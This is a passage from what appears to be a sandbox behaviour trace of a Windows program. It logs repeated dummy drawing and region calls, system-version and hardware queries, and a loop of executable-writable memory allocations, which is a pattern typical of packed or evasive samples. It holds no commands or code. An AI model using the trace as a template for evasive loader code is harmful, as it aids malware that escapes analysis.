hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.482] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.482] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.482] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.482] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.482] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbf0401d6 [0088.482] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc10401d3 [0088.482] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420a9 [0088.482] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420aa [0088.482] CombineRgn (hrgnDst=0x10420a9, hrgnSrc1=0xbf0401d6, hrgnSrc2=0xc10401d3, iMode=1) returned 1 [0088.482] CombineRgn (hrgnDst=0x10420aa, hrgnSrc1=0xbf0401d6, hrgnSrc2=0xc10401d3, iMode=4) returned 2 [0088.482] CreateSolidBrush (color=0xff) returned 0x21020a8 [0088.482] CreateSolidBrush (color=0xff0000) returned 0x11020ab [0088.482] DeleteObject (ho=0x11020ab) returned 1 [0088.482] DeleteObject (ho=0xc10401d3) returned 1 [0088.482] DeleteObject (ho=0xbf0401d6) returned 1 [0088.482] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.482] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.482] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.482] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.482] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.482] BeginPath (hdc=0x0) returned 0 [0088.482] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.482] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.482] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.482] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.482] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.482] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.482] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.482] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.483] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc20401d3 [0088.483] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc00401d6 [0088.483] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420ac [0088.483] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420ad [0088.483] CombineRgn (hrgnDst=0x10420ac, hrgnSrc1=0xc20401d3, hrgnSrc2=0xc00401d6, iMode=1) returned 1 [0088.483] CombineRgn (hrgnDst=0x10420ad, hrgnSrc1=0xc20401d3, hrgnSrc2=0xc00401d6, iMode=4) returned 2 [0088.483] CreateSolidBrush (color=0xff) returned 0x21020ab [0088.483] CreateSolidBrush (color=0xff0000) returned 0x11020ae [0088.483] DeleteObject (ho=0x11020ae) returned 1 [0088.483] DeleteObject (ho=0xc00401d6) returned 1 [0088.483] DeleteObject (ho=0xc20401d3) returned 1 [0088.483] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.483] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.483] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.483] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.483] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.483] BeginPath (hdc=0x0) returned 0 [0088.483] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.483] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.483] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.483] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.483] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.483] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.483] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.483] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.483] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc10401d6 [0088.483] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc30401d3 [0088.483] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420af [0088.483] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420b0 [0088.483] CombineRgn (hrgnDst=0x10420af, hrgnSrc1=0xc10401d6, hrgnSrc2=0xc30401d3, iMode=1) returned 1 [0088.483] CombineRgn (hrgnDst=0x10420b0, hrgnSrc1=0xc10401d6, hrgnSrc2=0xc30401d3, iMode=4) returned 2 [0088.483] CreateSolidBrush (color=0xff) returned 0x21020ae [0088.483] CreateSolidBrush (color=0xff0000) returned 0x11020b1 [0088.483] DeleteObject (ho=0x11020b1) returned 1 [0088.483] DeleteObject (ho=0xc30401d3) returned 1 [0088.483] DeleteObject (ho=0xc10401d6) returned 1 [0088.483] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.483] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.484] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.484] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.484] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.484] BeginPath (hdc=0x0) returned 0 [0088.484] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.484] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.484] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.484] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.484] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.484] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.484] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.484] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.484] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc40401d3 [0088.484] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc20401d6 [0088.484] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420b2 [0088.484] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420b3 [0088.484] CombineRgn (hrgnDst=0x10420b2, hrgnSrc1=0xc40401d3, hrgnSrc2=0xc20401d6, iMode=1) returned 1 [0088.484] CombineRgn (hrgnDst=0x10420b3, hrgnSrc1=0xc40401d3, hrgnSrc2=0xc20401d6, iMode=4) returned 2 [0088.484] CreateSolidBrush (color=0xff) returned 0x21020b1 [0088.484] CreateSolidBrush (color=0xff0000) returned 0x11020b4 [0088.484] DeleteObject (ho=0x11020b4) returned 1 [0088.484] DeleteObject (ho=0xc20401d6) returned 1 [0088.484] DeleteObject (ho=0xc40401d3) returned 1 [0088.484] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.484] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.484] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.484] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.484] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.484] BeginPath (hdc=0x0) returned 0 [0088.484] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.484] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.484] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.484] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.484] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.484] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.484] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.484] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.485] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc30401d6 [0088.485] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc50401d3 [0088.485] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420b5 [0088.485] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420b6 [0088.485] CombineRgn (hrgnDst=0x10420b5, hrgnSrc1=0xc30401d6, hrgnSrc2=0xc50401d3, iMode=1) returned 1 [0088.485] CombineRgn (hrgnDst=0x10420b6, hrgnSrc1=0xc30401d6, hrgnSrc2=0xc50401d3, iMode=4) returned 2 [0088.485] CreateSolidBrush (color=0xff) returned 0x21020b4 [0088.485] CreateSolidBrush (color=0xff0000) returned 0x11020b7 [0088.485] DeleteObject (ho=0x11020b7) returned 1 [0088.485] DeleteObject (ho=0xc50401d3) returned 1 [0088.485] DeleteObject (ho=0xc30401d6) returned 1 [0088.485] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.485] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.485] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.485] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.485] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.485] BeginPath (hdc=0x0) returned 0 [0088.485] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.485] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.485] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.485] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.485] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.485] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.485] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.485] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.485] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc60401d3 [0088.485] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc40401d6 [0088.485] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420b8 [0088.485] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420b9 [0088.485] CombineRgn (hrgnDst=0x10420b8, hrgnSrc1=0xc60401d3, hrgnSrc2=0xc40401d6, iMode=1) returned 1 [0088.485] CombineRgn (hrgnDst=0x10420b9, hrgnSrc1=0xc60401d3, hrgnSrc2=0xc40401d6, iMode=4) returned 2 [0088.485] CreateSolidBrush (color=0xff) returned 0x21020b7 [0088.485] CreateSolidBrush (color=0xff0000) returned 0x11020ba [0088.485] DeleteObject (ho=0x11020ba) returned 1 [0088.485] DeleteObject (ho=0xc40401d6) returned 1 [0088.485] DeleteObject (ho=0xc60401d3) returned 1 [0088.485] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.485] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.485] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.486] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.486] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.486] BeginPath (hdc=0x0) returned 0 [0088.486] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.486] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.486] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.486] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.486] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.486] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.486] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.486] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.486] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc50401d6 [0088.486] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc70401d3 [0088.486] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420bb [0088.486] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420bc [0088.486] CombineRgn (hrgnDst=0x10420bb, hrgnSrc1=0xc50401d6, hrgnSrc2=0xc70401d3, iMode=1) returned 1 [0088.486] CombineRgn (hrgnDst=0x10420bc, hrgnSrc1=0xc50401d6, hrgnSrc2=0xc70401d3, iMode=4) returned 2 [0088.486] CreateSolidBrush (color=0xff) returned 0x21020ba [0088.486] CreateSolidBrush (color=0xff0000) returned 0x11020bd [0088.486] DeleteObject (ho=0x11020bd) returned 1 [0088.486] DeleteObject (ho=0xc70401d3) returned 1 [0088.486] DeleteObject (ho=0xc50401d6) returned 1 [0088.486] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.486] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.486] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.486] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.486] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.486] BeginPath (hdc=0x0) returned 0 [0088.486] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.486] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.486] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.486] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.486] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.486] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.486] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.486] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.486] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc80401d3 [0088.486] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc60401d6 [0088.487] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420be [0088.487] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420bf [0088.487] CombineRgn (hrgnDst=0x10420be, hrgnSrc1=0xc80401d3, hrgnSrc2=0xc60401d6, iMode=1) returned 1 [0088.487] CombineRgn (hrgnDst=0x10420bf, hrgnSrc1=0xc80401d3, hrgnSrc2=0xc60401d6, iMode=4) returned 2 [0088.487] CreateSolidBrush (color=0xff) returned 0x21020bd [0088.487] CreateSolidBrush (color=0xff0000) returned 0x11020c0 [0088.487] DeleteObject (ho=0x11020c0) returned 1 [0088.487] DeleteObject (ho=0xc60401d6) returned 1 [0088.487] DeleteObject (ho=0xc80401d3) returned 1 [0088.487] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.487] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.194] SendMessageA (hWnd=0x20130, Msg=0xc, wParam=0x0, lParam=0x1885d4) returned 0x1 [0089.195] SendMessageA (hWnd=0x20130, Msg=0xd, wParam=0x3e8, lParam=0x1885d4) returned 0x9 [0089.195] GetLastError () returned 0x578 [0089.195] lstrlenA (lpString="-") returned 1 [0089.195] GetTextExtentPointA (in: hdc=0x0, lpString="-", c=1, lpsz=0x18f4bc | out: lpsz=0x18f4bc) returned 0 [0089.195] GetStockObject (i=13) returned 0x18a002e [0089.195] GetObjectA (in: h=0x18a002e, c=60, pv=0x18edf0 | out: pv=0x18edf0) returned 60 [0089.195] CreateFontIndirectA (lplf=0x18edf0) returned 0x0 [0089.195] SelectObject (hdc=0x0, h=0x6a7bdfc1) returned 0x0 [0089.195] lstrlenA (lpString="99/99") returned 5 [0089.195] GetTextExtentPointA (in: hdc=0x0, lpString="99/99", c=5, lpsz=0x18f4bc | out: lpsz=0x18f4bc) returned 0 [0089.195] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.195] ReleaseDC (hWnd=0x0, hDC=0x0) returned 0 [0089.195] EnumTimeFormatsA (lpTimeFmtEnumProc=0x23c0590, Locale=0x400, dwFlags=0x0) [0089.196] GetModuleHandleA (lpModuleName="ntdll") returned 0x76ea0000 [0089.196] GetModuleHandleA (lpModuleName="advapi32") returned 0x75960000 [0089.207] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0089.376] VirtualFree (lpAddress=0x3480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.378] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0089.388] VirtualFree (lpAddress=0x3480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.389] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0089.398] VirtualFree (lpAddress=0x3480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.400] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0089.410] VirtualFree (lpAddress=0x3480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.412] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0089.561] VirtualFree (lpAddress=0x3480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.563] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0089.572] VirtualFree (lpAddress=0x3480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.574] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0089.584] VirtualFree (lpAddress=0x3480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.586] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0089.758] VirtualFree (lpAddress=0x3480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.760] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0089.770] VirtualFree (lpAddress=0x3480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.772] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0089.784] VirtualFree (lpAddress=0x3480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.786] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0089.908] VirtualFree (lpAddress=0x3480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.910] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0089.922] VirtualFree (lpAddress=0x3480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.924] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0090.029] VirtualFree (lpAddress=0x3480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.031] GetModuleHandleA (lpModuleName="ntdll") returned 0x76ea0000 [0090.031] GetModuleHandleA (lpModuleName="advapi32") returned 0x75960000 [0090.041] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0090.044] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0090.054] VirtualFree (lpAddress=0x3480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.056] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0090.065] VirtualFree (lpAddress=0x3480000, 